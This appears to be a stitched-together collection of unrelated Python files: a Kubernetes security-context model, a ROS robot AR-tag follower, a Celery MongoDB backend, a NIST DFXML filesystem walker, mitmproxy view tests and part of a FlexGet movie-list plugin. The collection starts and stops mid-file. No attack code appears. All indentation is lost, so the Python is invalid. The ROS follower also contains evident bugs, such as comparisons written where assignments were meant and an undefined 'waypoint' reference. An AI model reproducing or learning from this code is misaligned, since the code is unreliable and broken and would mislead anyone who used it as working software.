:param run_as_user: The run_as_user of this V1SecurityContext.
:type: int
"""
self._run_as_user = run_as_user
@property
def run_as_non_root(self):
"""
Gets the run_as_non_root of this V1SecurityContext.
Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:return: The run_as_non_root of this V1SecurityContext.
:rtype: bool
"""
return self._run_as_non_root
@run_as_non_root.setter
def run_as_non_root(self, run_as_non_root):
"""
Sets the run_as_non_root of this V1SecurityContext.
Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:param run_as_non_root: The run_as_non_root of this V1SecurityContext.
:type: bool
"""
self._run_as_non_root = run_as_non_root
@property
def read_only_root_filesystem(self):
"""
Gets the read_only_root_filesystem of this V1SecurityContext.
Whether this container has a read-only root filesystem. Default is false.
:return: The read_only_root_filesystem of this V1SecurityContext.
:rtype: bool
"""
return self._read_only_root_filesystem
@read_only_root_filesystem.setter
def read_only_root_filesystem(self, read_only_root_filesystem):
"""
Sets the read_only_root_filesystem of this V1SecurityContext.
Whether this container has a read-only root filesystem. Default is false.
:param read_only_root_filesystem: The read_only_root_filesystem of this V1SecurityContext.
:type: bool
"""
self._read_only_root_filesystem = read_only_root_filesystem
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1SecurityContext.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
|
#!/usr/bin/env python
"""
ar_follower.py - Version 1.0 2013-08-25
Follow an AR tag published on the /ar_pose_marker topic. The /ar_pose_marker topic
is published by the ar_track_alvar package
Created for the Pi Robot Project: http://www.pirobot.org
Copyright (c) 2013 Patrick Goebel. All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details at:
http://www.gnu.org/licenses/gpl.html
"""
import rospy
import actionlib
from actionlib_msgs.msg import *
from ar_track_alvar.msg import AlvarMarkers
from geometry_msgs.msg import Pose, Point, Quaternion, Twist
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from tf.transformations import quaternion_from_euler
from visualization_msgs.msg import Marker
from math import copysign
from math import radians, pi
class ARFollower():
def __init__(self):
rospy.init_node("ar_follower")
# Set the shutdown function (stop the robot)
rospy.on_shutdown(self.shutdown)
# How often should we update the robot's motion?
self.rate = rospy.get_param("~rate", 10)
r = rospy.Rate(self.rate)
# The maximum rotation speed in radians per second
self.max_angular_speed = rospy.get_param("~max_angular_speed", 2.0)
# The minimum rotation speed in radians per second
self.min_angular_speed = rospy.get_param("~min_angular_speed", 0.5)
# The maximum distance a target can be from the robot for us to track
self.max_x = rospy.get_param("~max_x", 20.0)
# The goal distance (in meters) to keep between the robot and the marker
self.goal_x = rospy.get_param("~goal_x", 0.6)
# How far away from the goal distance (in meters) before the robot reacts
self.x_threshold = rospy.get_param("~x_threshold", 0.05)
# How far away from being centered (y displacement) on the AR marker
# before the robot reacts (units are meters)
self.y_threshold = rospy.get_param("~y_threshold", 0.05)
# How much do we weight the goal distance (x) when making a movement
self.x_scale = rospy.get_param("~x_scale", 0.5)
# How much do we weight y-displacement when making a movement
self.y_scale = rospy.get_param("~y_scale", 1.0)
# The max linear speed in meters per second
self.max_linear_speed = rospy.get_param("~max_linear_speed", 0.3)
# The minimum linear speed in meters per second
self.min_linear_speed = rospy.get_param("~min_linear_speed", 0.1)
# Publisher to control the robot's movement
self.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist)
# Intialize the movement command
self.move_cmd = Twist()
# Set flag to indicate when the AR marker is visible
self.target_visible = False
# Wait for the ar_pose_marker topic to become available
rospy.loginfo("Waiting for ar_pose_marker topic...")
rospy.wait_for_message('ar_pose_marker', AlvarMarkers)
# Subscribe to the ar_pose_marker topic to get the image width and height
rospy.Subscriber('ar_pose_marker', AlvarMarkers, self.set_cmd_vel)
rospy.loginfo("Marker messages detected. Starting follower...")
"""
Some modification
"""
self.canFollow = True
self.TakeRight = False
quaternions = list()
euler_angles = (pi/2, pi, 3*pi/2, 0)
for angle in euler_angles:
q_angle = quaternion_from_euler(0, 0, angle, axes='sxyz')
q = Quaternion(*q_angle)
quaternions.append(q)
waypoints = list()
waypoints.append(Pose(Point(0, 0.0, 0.0), quaternions[0]))
waypoints.append(Pose(Point(1, 1, 0.0), quaternions[1]))
waypoints.append(Pose(Point(0.0, 1, 0.0), quaternions[2]))
waypoints.append(Pose(Point(0.0, 0.0, 0.0), quaternions[3]))
# not using markers
for waypoint in waypoints:
p = Point()
p = waypoint.position
self.move_base = actionlib.SimpleActionClient("move_base", MoveBaseAction)
rospy.loginfo("Waiting for move_base action server...")
self.move_base.wait_for_server(rospy.Duration(60))
rospy.loginfo("Connected to move base server")
rospy.loginfo("Starting navigation test")
# Begin the cmd_vel publishing loop
while not rospy.is_shutdown():
# Send the Twist command to the robot
self.cmd_vel_pub.publish(self.move_cmd)
# Sleep for 1/self.rate seconds
r.sleep()
def set_cmd_vel(self, msg):
# Pick off the first marker (in case there is more than one)
try:
marker = msg.markers[0]
if not self.target_visible:
rospy.loginfo("FOLLOWER is Tracking Target!")
self.target_visible = True
except:
# If target is loar, stop the robot by slowing it incrementally
self.move_cmd.linear.x /= 1.5
self.move_cmd.angular.z /= 1.5
if self.target_visible:
rospy.loginfo("FOLLOWER LOST Target!")
self.target_visible = False
return
# Get the displacement of the marker relative to the base
target_offset_y = marker.pose.pose.position.y
# Get the distance of the marker from the base
target_offset_x = marker.pose.pose.position.x
# Rotate the robot only if the displacement of the target exceeds the threshold
if abs(target_offset_y) > self.y_threshold :
# Set the rotation speed proportional to the displacement of the target
if self.canFollow == True:
speed = target_offset_y * self.y_scale
self.move_cmd.angular.z = copysign(max(self.min_angular_speed, min(self.max_angular_speed, abs(speed))), speed)
else:
self.move_cmd.angular.z = 0.0
# Now get the linear speed
if abs(target_offset_x - self.goal_x) > self.x_threshold:
if self.canFollow == True:
speed = (target_offset_x - self.goal_x) * self.x_scale
if speed < 0:
speed *= 1.5
self.move_cmd.linear.x = copysign(min(self.max_linear_speed, max(self.min_linear_speed, abs(speed))), speed)
else:
self.move_cmd.linear.x = 0.0
self.canFollow == False
TakeRight == True
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = 'map'
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose = waypoint[0]
self.move(goal)
def move(self, goal):
self.move_base.send_goal(goal)
finished_within_time = self.move_base.wait_for_result(rospy.Duration(60))
if not finished_within_time:
self.move_base.cancel_goal()
rospy.loginfo("Timed out achieving goal")
else:
# We made it!
state = self.move_base.get_state()
if state == GoalStatus.SUCCEEDED:
rospy.loginfo("Goal succeeded!")
def shutdown(self):
rospy.loginfo("Stopping the robot...")
self.cmd_vel_pub.publish(Twist())
rospy.sleep(1)
if __name__ == '__main__':
try:
ARFollower()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("AR follower node terminated.")
|
|
# -*- coding: utf-8 -*-
"""MongoDB backend for celery."""
from __future__ import absolute_import
from datetime import datetime
try:
import pymongo
except ImportError: # pragma: no cover
pymongo = None # noqa
if pymongo:
try:
from bson.binary import Binary
except ImportError: # pragma: no cover
from pymongo.binary import Binary # noqa
else: # pragma: no cover
Binary = None # noqa
from kombu.utils import cached_property
from celery import states
from celery.exceptions import ImproperlyConfigured
from celery.utils.timeutils import maybe_timedelta
from .base import BaseDictBackend
class Bunch(object):
def __init__(self, **kw):
self.__dict__.update(kw)
class MongoBackend(BaseDictBackend):
mongodb_host = "localhost"
mongodb_port = 27017
mongodb_user = None
mongodb_password = None
mongodb_database = "celery"
mongodb_taskmeta_collection = "celery_taskmeta"
def __init__(self, *args, **kwargs):
"""Initialize MongoDB backend instance.
:raises celery.exceptions.ImproperlyConfigured: if
module :mod:`pymongo` is not available.
"""
super(MongoBackend, self).__init__(*args, **kwargs)
self.expires = kwargs.get("expires") or maybe_timedelta(
self.app.conf.CELERY_TASK_RESULT_EXPIRES)
if not pymongo:
raise ImproperlyConfigured(
"You need to install the pymongo library to use the "
"MongoDB backend.")
config = self.app.conf.get("CELERY_MONGODB_BACKEND_SETTINGS", None)
if config is not None:
if not isinstance(config, dict):
raise ImproperlyConfigured(
"MongoDB backend settings should be grouped in a dict")
self.mongodb_host = config.get("host", self.mongodb_host)
self.mongodb_port = int(config.get("port", self.mongodb_port))
self.mongodb_user = config.get("user", self.mongodb_user)
self.mongodb_password = config.get(
"password", self.mongodb_password)
self.mongodb_database = config.get(
"database", self.mongodb_database)
self.mongodb_taskmeta_collection = config.get(
"taskmeta_collection", self.mongodb_taskmeta_collection)
self._connection = None
def _get_connection(self):
"""Connect to the MongoDB server."""
if self._connection is None:
from pymongo.connection import Connection
# The first pymongo.Connection() argument (host) can be
# a list of ['host:port'] elements or a mongodb connection
# URI. If this is the case, don't use self.mongodb_port
# but let pymongo get the port(s) from the URI instead.
# This enables the use of replica sets and sharding.
# See pymongo.Connection() for more info.
args = [self.mongodb_host]
if isinstance(self.mongodb_host, basestring) \
and not self.mongodb_host.startswith("mongodb://"):
args.append(self.mongodb_port)
self._connection = Connection(*args)
return self._connection
def process_cleanup(self):
if self._connection is not None:
# MongoDB connection will be closed automatically when object
# goes out of scope
self._connection = None
def _store_result(self, task_id, result, status, traceback=None):
"""Store return value and status of an executed task."""
meta = {"_id": task_id,
"status": status,
"result": Binary(self.encode(result)),
"date_done": datetime.utcnow(),
"traceback": Binary(self.encode(traceback)),
"children": Binary(self.encode(self.current_task_children()))}
self.collection.save(meta, safe=True)
return result
def _get_task_meta_for(self, task_id):
"""Get task metadata for a task by id."""
obj = self.collection.find_one({"_id": task_id})
if not obj:
return {"status": states.PENDING, "result": None}
meta = {
"task_id": obj["_id"],
"status": obj["status"],
"result": self.decode(obj["result"]),
"date_done": obj["date_done"],
"traceback": self.decode(obj["traceback"]),
"children": self.decode(obj["children"]),
}
return meta
def _save_taskset(self, taskset_id, result):
"""Save the taskset result."""
meta = {"_id": taskset_id,
"result": Binary(self.encode(result)),
"date_done": datetime.utcnow()}
self.collection.save(meta, safe=True)
return result
def _restore_taskset(self, taskset_id):
"""Get the result for a taskset by id."""
obj = self.collection.find_one({"_id": taskset_id})
if not obj:
return
meta = {
"task_id": obj["_id"],
"result": self.decode(obj["result"]),
"date_done": obj["date_done"],
}
return meta
def _delete_taskset(self, taskset_id):
"""Delete a taskset by id."""
self.collection.remove({"_id": taskset_id})
def _forget(self, task_id):
"""
Remove result from MongoDB.
:raises celery.exceptions.OperationsError: if the task_id could not be
removed.
"""
# By using safe=True, this will wait until it receives a response from
# the server. Likewise, it will raise an OperationsError if the
# response was unable to be completed.
self.collection.remove({"_id": task_id}, safe=True)
def cleanup(self):
"""Delete expired metadata."""
self.collection.remove({
"date_done": {
"$lt": self.app.now() - self.expires,
}
})
def __reduce__(self, args=(), kwargs={}):
kwargs.update(
dict(expires=self.expires))
return super(MongoBackend, self).__reduce__(args, kwargs)
def _get_database(self):
conn = self._get_connection()
db = conn[self.mongodb_database]
if self.mongodb_user and self.mongodb_password:
if not db.authenticate(self.mongodb_user,
self.mongodb_password):
raise ImproperlyConfigured(
"Invalid MongoDB username or password.")
return db
@cached_property
def database(self):
"""Get database from MongoDB connection and perform authentication
if necessary."""
return self._get_database()
@cached_property
def collection(self):
"""Get the metadata task collection."""
collection = self.database[self.mongodb_taskmeta_collection]
# Ensure an index on date_done is there, if not process the index
# in the background. Once completed cleanup will be much faster
collection.ensure_index('date_done', background='true')
return collection
|
|
#!/usr/bin/env python3
# This software was developed at the National Institute of Standards
# and Technology by employees of the Federal Government in the course
# of their official duties. Pursuant to title 17 Section 105 of the
# United States Code this software is not subject to copyright
# protection and is in the public domain. NIST assumes no
# responsibility whatsoever for its use by other parties, and makes
# no guarantees, expressed or implied, about its quality,
# reliability, or any other characteristic.
#
# We would appreciate acknowledgement if the software is used.
"""Walk current directory, writing DFXML to stdout."""
__version__ = "0.3.0"
import os
import stat
import hashlib
import argparse
import traceback
import logging
import sys
_logger = logging.getLogger(os.path.basename(__file__))
import Objects
def filepath_to_fileobject(filepath, args):
fobj = Objects.FileObject()
#Determine type - done in three steps.
if os.path.islink(filepath):
fobj.name_type = "l"
elif os.path.isdir(filepath):
fobj.name_type = "d"
elif os.path.isfile(filepath):
fobj.name_type = "r"
else:
#Need to finish type determinations with stat structure.
pass
#Prime fileobjects from Stat data (lstat for soft links).
if fobj.name_type == "l":
sobj = os.lstat(filepath)
else:
sobj = os.stat(filepath)
#_logger.debug(sobj)
fobj.populate_from_stat(sobj)
if fobj.name_type is None:
if stat.S_ISCHR(fobj.mode):
fobj.name_type = "c"
elif stat.S_ISBLK(fobj.mode):
fobj.name_type = "b"
elif stat.S_ISFIFO(fobj.mode):
fobj.name_type = "p"
elif stat.S_ISSOCK(fobj.mode):
fobj.name_type = "s"
elif stat.S_ISWHT(fobj.mode):
fobj.name_type = "w"
else:
raise NotImplementedError("No reporting check written for file type of %r." % filepath)
#Hard-coded information: Name, and assumed allocation status.
fobj.filename = filepath
fobj.alloc = True
if fobj.name_type == "l":
fobj.link_target = os.readlink(filepath)
if not args.n:
#Add hashes for regular files.
if fobj.name_type == "r":
try:
with open(filepath, "rb") as in_fh:
chunk_size = 2**22
md5obj = hashlib.md5()
sha512obj = hashlib.sha512()
any_error = False
while True:
buf = b""
try:
buf = in_fh.read(chunk_size)
except Exception as e:
any_error = True
fobj.error = "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
buf = b""
if buf == b"":
break
md5obj.update(buf)
sha512obj.update(buf)
if not any_error:
fobj.md5 = md5obj.hexdigest()
fobj.sha512 = sha512obj.hexdigest()
except Exception as e:
if fobj.error is None:
fobj.error = ""
else:
fobj.error += "\n"
fobj.error += "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
return fobj
def main(args_):
#Determine whether we're going in threading mode or not. (Some modules are not available by default.)
args = parse_args(args_)
using_threading = False
if args.jobs > 1:
using_threading = True #(unless supporting modules are absent)
try:
import threading
except:
using_threading = False
_logger.warning("Threading support not available. Running in single thread only.")
try:
import queue
except:
using_threading = False
_logger.warning("Python queue support not available. (If running Ubuntu, this is in package python3-queuelib.) Running in single thread only.")
dobj = Objects.DFXMLObject(version="1.1.1")
dobj.program = sys.argv[0]
dobj.program_version = __version__
dobj.command_line = " ".join(sys.argv)
dobj.dc["type"] = "File system walk"
dobj.add_creator_library("Python", ".".join(map(str, sys.version_info[0:3]))) #A bit of a bend, but gets the major version information out.
dobj.add_creator_library("Objects.py", Objects.__version__)
dobj.add_creator_library("dfxml.py", Objects.dfxml.__version__)
filepaths = set()
filepaths.add(".")
for (dirpath, dirnames, filenames) in os.walk("."):
dirent_names = set()
for dirname in dirnames:
dirent_names.add(dirname)
for filename in filenames:
dirent_names.add(filename)
for dirent_name in sorted(dirent_names):
#The relpath wrapper removes "./" from the head of the path.
filepath = os.path.relpath(os.path.join(dirpath, dirent_name))
filepaths.add(filepath)
fileobjects_by_filepath = dict()
if using_threading:
#Threading syntax c/o: https://docs.python.org/3.5/library/queue.html
q = queue.Queue()
threads = []
def _worker():
while True:
filepath = q.get()
if filepath is None:
break
fobj = filepath_to_fileobject(filepath, args)
fileobjects_by_filepath[filepath] = fobj
q.task_done()
for i in range(args.jobs):
t = threading.Thread(target=_worker)
t.start()
threads.append(t)
for filepath in filepaths:
q.put(filepath)
# block until all tasks are done
q.join()
# stop workers
for i in range(args.jobs):
q.put(None)
for t in threads:
t.join()
else: #Not threading.
for filepath in sorted(filepaths):
fobj = filepath_to_fileobject(filepath, args)
fileobjects_by_filepath[filepath] = fobj
#Build output DFXML tree.
for filepath in sorted(fileobjects_by_filepath.keys()):
dobj.append(fileobjects_by_filepath[filepath])
return dobj.to_dfxml()
def parse_args(args_):
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-n", action="store_true", help="Do not calculate any hashes")
parser.add_argument("-j", "--jobs", type=int, default=1, help="Number of file-processing threads to run.")
args = parser.parse_args(args_)
logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)
if args.jobs <= 0:
raise ValueError("If requesting multiple jobs, please request 1 or more worker threads.")
return args
if __name__ == "__main__":
main(sys.argv[1:])
|
|
import pytest
from mitmproxy.test import tflow
from mitmproxy.addons import view
from mitmproxy import flowfilter
from mitmproxy import options
from mitmproxy.test import taddons
def tft(*, method="get", start=0):
f = tflow.tflow()
f.request.method = method
f.request.timestamp_start = start
return f
class Options(options.Options):
def __init__(
self,
*,
filter=None,
console_order=None,
console_order_reversed=False,
console_focus_follow=False,
**kwargs
):
self.filter = filter
self.console_order = console_order
self.console_order_reversed = console_order_reversed
self.console_focus_follow = console_focus_follow
super().__init__(**kwargs)
def test_order_refresh():
v = view.View()
sargs = []
def save(*args, **kwargs):
sargs.extend([args, kwargs])
v.sig_view_refresh.connect(save)
tf = tflow.tflow(resp=True)
with taddons.context(options=Options()) as tctx:
tctx.configure(v, console_order="time")
v.add(tf)
tf.request.timestamp_start = 1
assert not sargs
v.update(tf)
assert sargs
def test_order_generators():
v = view.View()
tf = tflow.tflow(resp=True)
rs = view.OrderRequestStart(v)
assert rs.generate(tf) == 0
rm = view.OrderRequestMethod(v)
assert rm.generate(tf) == tf.request.method
ru = view.OrderRequestURL(v)
assert ru.generate(tf) == tf.request.url
sz = view.OrderKeySize(v)
assert sz.generate(tf) == len(tf.request.raw_content) + len(tf.response.raw_content)
def test_simple():
v = view.View()
f = tft(start=1)
assert v.store_count() == 0
v.request(f)
assert list(v) == [f]
assert v.get_by_id(f.id)
assert not v.get_by_id("nonexistent")
# These all just call update
v.error(f)
v.response(f)
v.intercept(f)
v.resume(f)
v.kill(f)
assert list(v) == [f]
v.request(f)
assert list(v) == [f]
assert len(v._store) == 1
assert v.store_count() == 1
f2 = tft(start=3)
v.request(f2)
assert list(v) == [f, f2]
v.request(f2)
assert list(v) == [f, f2]
assert len(v._store) == 2
assert v.inbounds(0)
assert not v.inbounds(-1)
assert not v.inbounds(100)
f3 = tft(start=2)
v.request(f3)
assert list(v) == [f, f3, f2]
v.request(f3)
assert list(v) == [f, f3, f2]
assert len(v._store) == 3
f.marked = not f.marked
f2.marked = not f2.marked
v.clear_not_marked()
assert list(v) == [f, f2]
assert len(v) == 2
assert len(v._store) == 2
v.clear()
assert len(v) == 0
assert len(v._store) == 0
def test_filter():
v = view.View()
f = flowfilter.parse("~m get")
v.request(tft(method="get"))
v.request(tft(method="put"))
v.request(tft(method="get"))
v.request(tft(method="put"))
assert(len(v)) == 4
v.set_filter(f)
assert [i.request.method for i in v] == ["GET", "GET"]
assert len(v._store) == 4
v.set_filter(None)
assert len(v) == 4
v.toggle_marked()
assert len(v) == 0
v.toggle_marked()
assert len(v) == 4
v[1].marked = True
v.toggle_marked()
assert len(v) == 1
assert v[0].marked
v.toggle_marked()
assert len(v) == 4
def test_order():
v = view.View()
with taddons.context(options=Options()) as tctx:
v.request(tft(method="get", start=1))
v.request(tft(method="put", start=2))
v.request(tft(method="get", start=3))
v.request(tft(method="put", start=4))
assert [i.request.timestamp_start for i in v] == [1, 2, 3, 4]
tctx.configure(v, console_order="method")
assert [i.request.method for i in v] == ["GET", "GET", "PUT", "PUT"]
v.set_reversed(True)
assert [i.request.method for i in v] == ["PUT", "PUT", "GET", "GET"]
tctx.configure(v, console_order="time")
assert [i.request.timestamp_start for i in v] == [4, 3, 2, 1]
v.set_reversed(False)
assert [i.request.timestamp_start for i in v] == [1, 2, 3, 4]
def test_reversed():
v = view.View()
v.request(tft(start=1))
v.request(tft(start=2))
v.request(tft(start=3))
v.set_reversed(True)
assert v[0].request.timestamp_start == 3
assert v[-1].request.timestamp_start == 1
assert v[2].request.timestamp_start == 1
with pytest.raises(IndexError):
v[5]
with pytest.raises(IndexError):
v[-5]
assert v._bisect(v[0]) == 1
assert v._bisect(v[2]) == 3
def test_update():
v = view.View()
flt = flowfilter.parse("~m get")
v.set_filter(flt)
f = tft(method="get")
v.request(f)
assert f in v
f.request.method = "put"
v.update(f)
assert f not in v
f.request.method = "get"
v.update(f)
assert f in v
v.update(f)
assert f in v
class Record:
def __init__(self):
self.calls = []
def __bool__(self):
return bool(self.calls)
def __repr__(self):
return repr(self.calls)
def __call__(self, *args, **kwargs):
self.calls.append((args, kwargs))
def test_signals():
v = view.View()
rec_add = Record()
rec_update = Record()
rec_remove = Record()
rec_refresh = Record()
def clearrec():
rec_add.calls = []
rec_update.calls = []
rec_remove.calls = []
rec_refresh.calls = []
v.sig_view_add.connect(rec_add)
v.sig_view_update.connect(rec_update)
v.sig_view_remove.connect(rec_remove)
v.sig_view_refresh.connect(rec_refresh)
assert not any([rec_add, rec_update, rec_remove, rec_refresh])
# Simple add
v.add(tft())
assert rec_add
assert not any([rec_update, rec_remove, rec_refresh])
# Filter change triggers refresh
clearrec()
v.set_filter(flowfilter.parse("~m put"))
assert rec_refresh
assert not any([rec_update, rec_add, rec_remove])
v.set_filter(flowfilter.parse("~m get"))
# An update that results in a flow being added to the view
clearrec()
v[0].request.method = "PUT"
v.update(v[0])
assert rec_remove
assert not any([rec_update, rec_refresh, rec_add])
# An update that does not affect the view just sends update
v.set_filter(flowfilter.parse("~m put"))
clearrec()
v.update(v[0])
assert rec_update
assert not any([rec_remove, rec_refresh, rec_add])
# An update for a flow in state but not view does not do anything
f = v[0]
v.set_filter(flowfilter.parse("~m get"))
assert not len(v)
clearrec()
v.update(f)
assert not any([rec_add, rec_update, rec_remove, rec_refresh])
def test_focus_follow():
v = view.View()
with taddons.context(options=Options()) as tctx:
tctx.configure(v, console_focus_follow=True, filter="~m get")
v.add(tft(start=5))
assert v.focus.index == 0
v.add(tft(start=4))
assert v.focus.index == 0
assert v.focus.flow.request.timestamp_start == 4
v.add(tft(start=7))
assert v.focus.index == 2
assert v.focus.flow.request.timestamp_start == 7
mod = tft(method="put", start=6)
v.add(mod)
assert v.focus.index == 2
assert v.focus.flow.request.timestamp_start == 7
mod.request.method = "GET"
v.update(mod)
assert v.focus.index == 2
assert v.focus.flow.request.timestamp_start == 6
def test_focus():
# Special case - initialising with a view that already contains data
v = view.View()
v.add(tft())
f = view.Focus(v)
assert f.index is 0
assert f.flow is v[0]
# Start empty
v = view.View()
f = view.Focus(v)
assert f.index is None
assert f.flow is None
v.add(tft(start=1))
assert f.index == 0
assert f.flow is v[0]
# Try to set to something not in view
with pytest.raises(ValueError):
f.__setattr__("flow", tft())
with pytest.raises(ValueError):
f.__setattr__("index", 99)
v.add(tft(start=0))
assert f.index == 1
assert f.flow is v[1]
v.add(tft(start=2))
assert f.index == 1
assert f.flow is v[1]
f.index = 0
assert f.index == 0
f.index = 1
v.remove(v[1])
assert f.index == 1
assert f.flow is v[1]
v.remove(v[1])
assert f.index == 0
assert f.flow is v[0]
v.remove(v[0])
assert f.index is None
assert f.flow is None
v.add(tft(method="get", start=0))
v.add(tft(method="get", start=1))
v.add(tft(method="put", start=2))
v.add(tft(method="get", start=3))
f.flow = v[2]
assert f.flow.request.method == "PUT"
filt = flowfilter.parse("~m get")
v.set_filter(filt)
assert f.index == 2
filt = flowfilter.parse("~m oink")
v.set_filter(filt)
assert f.index is None
def test_settings():
v = view.View()
f = tft()
with pytest.raises(KeyError):
v.settings[f]
v.add(f)
v.settings[f]["foo"] = "bar"
assert v.settings[f]["foo"] == "bar"
assert len(list(v.settings)) == 1
v.remove(f)
with pytest.raises(KeyError):
v.settings[f]
assert not v.settings.keys()
v.add(f)
v.settings[f]["foo"] = "bar"
assert v.settings.keys()
v.clear()
assert not v.settings.keys()
def test_configure():
v = view.View()
with taddons.context(options=Options()) as tctx:
tctx.configure(v, filter="~q")
with pytest.raises(Exception, match="Invalid interception filter"):
tctx.configure(v, filter="~~")
tctx.configure(v, console_order="method")
with pytest.raises(Exception, match="Unknown flow order"):
tctx.configure(v, console_order="no")
tctx.configure(v, console_order_reversed=True)
tctx.configure(v, console_order=None)
tctx.configure(v, console_focus_follow=True)
assert v.focus_follow
|
|
from __future__ import unicode_literals, division, absolute_import
import logging
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from collections import MutableSet
from datetime import datetime
from sqlalchemy import Column, Unicode, Integer, ForeignKey, func, DateTime
from sqlalchemy.orm import relationship
from sqlalchemy.sql.elements import and_
from flexget import plugin
from flexget.db_schema import versioned_base, with_session
from flexget.entry import Entry
from flexget.event import event
from flexget.manager import Session
from flexget.plugin import get_plugin_by_name
from flexget.plugins.parsers.parser_common import normalize_name, remove_dirt
from flexget.utils.tools import split_title_year
log = logging.getLogger('movie_list')
Base = versioned_base('movie_list', 0)
class MovieListBase(object):
"""
Class that contains helper methods for movie list as well as plugins that use it,
such as API and CLI.
"""
@property
def supported_ids(self):
# Return a list of supported series identifier as registered via their plugins
return [p.instance.movie_identifier for p in plugin.get_plugins(group='movie_metainfo')]
class MovieListList(Base):
__tablename__ = 'movie_list_lists'
id = Column(Integer, primary_key=True)
name = Column(Unicode, unique=True)
added = Column(DateTime, default=datetime.now)
movies = relationship('MovieListMovie', backref='list', cascade='all, delete, delete-orphan', lazy='dynamic')
def __repr__(self):
return '<MovieListList,name={}id={}>'.format(self.name, self.id)
def to_dict(self):
return {
'id': self.id,
'name': self.name,
'added_on': self.added
}
class MovieListMovie(Base):
__tablename__ = 'movie_list_movies'
id = Column(Integer, primary_key=True)
added = Column(DateTime, default=datetime.now)
title = Column(Unicode)
year = Column(Integer)
list_id = Column(Integer, ForeignKey(MovieListList.id), nullable=False)
ids = relationship('MovieListID', backref='movie', cascade='all, delete, delete-orphan')
def __repr__(self):
return '<MovieListMovie title=%s,year=%s,list_id=%d>' % (self.title, self.year, self.list_id)
def to_entry(self, strip_year=False):
entry = Entry()
entry['title'] = entry['movie_name'] = self.title
entry['url'] = 'mock://localhost/movie_list/%d' % self.id
entry['added'] = self.added
if self.year:
if strip_year is False:
entry['title'] += ' (%d)' % self.year
entry['movie_year'] = self.year
for movie_list_id in self.ids:
entry[movie_list_id.id_name] = movie_list_id.id_value
return entry
def to_dict(self):
return {
'id': self.id,
'added_on': self.added,
'title': self.title,
'year': self.year,
'list_id': self.list_id,
'movies_list_ids': [movie_list_id.to_dict() for movie_list_id in self.ids]
}
@property
def identifiers(self):
""" Return a dict of movie identifiers """
return {identifier.id_name: identifier.id_value for identifier in self.ids}
class MovieListID(Base):
__tablename__ = 'movie_list_ids'
id = Column(Integer, primary_key=True)
added = Column(DateTime, default=datetime.now)
id_name = Column(Unicode)
id_value = Column(Unicode)
movie_id = Column(Integer, ForeignKey(MovieListMovie.id))
def __repr__(self):
return '<MovieListID id_name=%s,id_value=%s,movie_id=%d>' % (self.id_name, self.id_value, self.movie_id)
def to_dict(self):
return {
'id': self.id,
'added_on': self.added,
'id_name': self.id_name,
'id_value': self.id_value,
'movie_id': self.movie_id
}
class MovieList(MutableSet):
def _db_list(self, session):
return session.query(MovieListList).filter(MovieListList.name == self.list_name).first()
def _from_iterable(self, it):
# TODO: is this the right answer? the returned object won't have our custom __contains__ logic
return set(it)
@with_session
def __init__(self, config, session=None):
if not isinstance(config, dict):
config = {'list_name': config}
config.setdefault('strip_year', False)
self.list_name = config.get('list_name')
self.strip_year = config.get('strip_year')
db_list = self._db_list(session)
if not db_list:
session.add(MovieListList(name=self.list_name))
def __iter__(self):
with Session() as session:
return iter([movie.to_entry(self.strip_year) for movie in self._db_list(session).movies])
def __len__(self):
with Session() as session:
return len(self._db_list(session).movies)
def add(self, entry):
with Session() as session:
# Check if this is already in the list, refresh info if so
db_list = self._db_list(session=session)
db_movie = self._find_entry(entry, session=session)
# Just delete and re-create to refresh
if db_movie:
session.delete(db_movie)
db_movie = MovieListMovie()
if 'movie_name' in entry:
db_movie.title, db_movie.year = entry['movie_name'], entry.get('movie_year')
else:
db_movie.title, db_movie.year = split_title_year(entry['title'])
for id_name in MovieListBase().supported_ids:
if id_name in entry:
db_movie.ids.append(MovieListID(id_name=id_name, id_value=entry[id_name]))
log.debug('adding entry %s', entry)
db_list.movies.append(db_movie)
session.commit()
return db_movie.to_entry()
def discard(self, entry):
with Session() as session:
db_movie = self._find_entry(entry, session=session)
if db_movie:
log.debug('deleting movie %s', db_movie)
session.delete(db_movie)
def __contains__(self, entry):
return self._find_entry(entry) is not None
@with_session
def _find_entry(self, entry, session=None):
"""Finds `MovieListMovie` corresponding to this entry, if it exists."""
# Match by supported IDs
for id_name in MovieListBase().supported_ids:
if entry.get(id_name):
log.debug('trying to match movie based off id %s: %s', id_name, entry[id_name])
res = (self._db_list(session).movies.join(MovieListMovie.ids).filter(
and_(
